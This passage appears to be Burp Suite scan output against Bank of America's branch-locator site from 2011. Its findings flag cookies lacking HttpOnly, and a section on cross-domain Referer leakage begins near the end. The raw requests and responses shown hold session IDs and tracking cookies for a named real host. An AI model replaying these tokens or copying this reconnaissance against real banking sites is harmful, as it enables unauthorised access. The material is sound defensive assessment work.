Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.63. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:42 GMT
Server: Apache
Set-Cookie: JSESSIONID=BC84D141ECB2B0960CE135C7867D317F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.64. http://locators.bankofamerica.com/locator/locator/BrowseByCityAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByCityAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/BrowseByCityAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=C9796C206BC2449903FF5C96D1BDB314.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/BrowseByCityAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.65. http://locators.bankofamerica.com/locator/locator/BrowseByCityLetterAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByCityLetterAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/BrowseByCityLetterAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=4D22460A4573415B81DD6ED64D131C2F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/BrowseByCityLetterAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.66. http://locators.bankofamerica.com/locator/locator/BrowseByPostalCodeAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByPostalCodeAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/BrowseByPostalCodeAction.do?state=KS&searchCustom__searchType=Footprint&city=Andover HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=A85814C513652A485F35EA59B40D986B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/BrowseByPostalCodeAction.do?state=KS&searchCustom__searchType=Footprint&city=Andover&shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.67. http://locators.bankofamerica.com/locator/locator/BrowseByStateAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByStateAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/BrowseByStateAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=38D63A7644928BD4D1C9EAD6BF2D02A7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/BrowseByStateAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.68. http://locators.bankofamerica.com/locator/locator/FullPageSearchAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/FullPageSearchAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/FullPageSearchAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=622C313901EBF1E26FC94E24E200581E.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/FullPageSearchAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.69. http://locators.bankofamerica.com/locator/locator/InternationalLocAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/InternationalLocAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/InternationalLocAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=12F5A0C2893BE9C4AAA457361AC2E5A4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/InternationalLocAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.70. http://locators.bankofamerica.com/locator/locator/LocatorAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/LocatorAction.do HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://learn.bankofamerica.com/articles/managing-credit/understanding-your-credit-card.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 28 Jun 2011 21:19:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/LocatorAction.do?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

2.71. http://locators.bankofamerica.com/locator/locator/QuickHelp.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/QuickHelp.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/QuickHelp.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=ACD9CD804F96EB56C9CBA63FFD2F486D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/QuickHelp.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.72. http://locators.bankofamerica.com/locator/locator/ResultsDisplayAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/ResultsDisplayAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/ResultsDisplayAction.do?startIndex=11 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=88F5F32B0B80DCAEB86E2FF80E8C57B8.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/ResultsDisplayAction.do?startIndex=11&shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.73. http://locators.bankofamerica.com/locator/locator/SearchAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/SearchAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/SearchAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:17:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=C012183F5E18941319AA35E53899E88F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/SearchAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.74. http://locators.bankofamerica.com/locator/locator/SessionTimeout.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/SessionTimeout.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/SessionTimeout.do HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 28 Jun 2011 21:41:30 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; Path=/locator/locator
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp?shouldTest=true
Content-Language: en-USF8B75
5E9F1529F70
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html;charset=ISO-8859-1

2.75. http://locators.bankofamerica.com/locator/locator/bbcc3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/bbcc3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/bbcc3 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://burp/show/38
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C6C352B8409169D5601399CB3D176E0C.ftb-web1; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; state=MA; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:11:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=E3D3354BF951B96A4F54D04B8F1E082D.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/bbcc3?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

2.76. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/SessionTimeoutNotification.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/jsp/SessionTimeoutNotification.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=25DF095421BF9E12B6D2BA6283F895D7.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; cmTPSet=Y; state=MA; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(true%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Cfalse%2Cnull)%3B%5C%22%2C1000)%3B%22%2C%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22hours_24%22%3A%22document.getElementById('hours_24').checked%20%3D%20true%3B%22%2C%22atm_locations%22%3A%22document.getElementById('atm_locations').checked%20%3D%20true%3B%22%2C%22inside_lobby%22%3A%22document.getElementById('inside_lobby').checked%20%3D%20true%3B%22%2C%22drive_up_atm%22%3A%22document.getElementById('drive_up_atm').checked%20%3D%20true%3B%22%2C%22accepts_deposits%22%3A%22document.getElementById('accepts_deposits').checked%20%3D%20true%3B%22%2C%22commercial_deposits%22%3A%22document.getElementById('commercial_deposits').checked%20%3D%20true%3B%22%2C%22bc_locations%22%3A%22document.getElementById('bc_locations').checked%20%3D%20true%3B%22%2C%22open_saturdays%22%3A%22document.getElementById('open_saturdays').checked%20%3D%20true%3B%22%2C%22accepts_appointments%22%3A%22document.getElementById('accepts_appointments').checked%20%3D%20true%3B%22%2C%22night_deposits%22%3A%22document.getElementById('night_deposits').checked%20%3D%20true%3B%22%2C%22drive_up_bc%22%3A%22document.getElementById('drive_up_bc').checked%20%3D%20true%3B%22%2C%22change_orders%22%3A%22document.getElementById('change_orders').checked%20%3D%20true%3B%22%7D; profilePageState=; cmRS=&t1=1309349734538&t2=1309349737587&t3=1309349752114&t4=1309349724463&lti=1309349749335&ln=&hr=http%3A//locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/39; appSession=WEAS; TLTSID=DC94A6B4A24A10A23E60D01283232BFC; TLTUID=DC94A6B4A24A10A23E60D01283232BFC; SERVERID=1309348382808_26288_95

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:48:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F244EEDE3C8A00A7A7D812BE866C1FB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

3. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

3.1. http://locators.bankofamerica.com/locator/locator/LocatorAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /locator/locator/LocatorAction.do?shouldTest=true HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://burp/show/39
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7894BCA611FAAB1840DF2CF8073E57E8.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; cmTPSet=Y; cmRS=&t1=1309349540116&t2=1309349543507&t3=1309349556019&lti=1309349556019&ln=&hr=javascript%3A%20void%280%29%3B&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/38; state=MA; 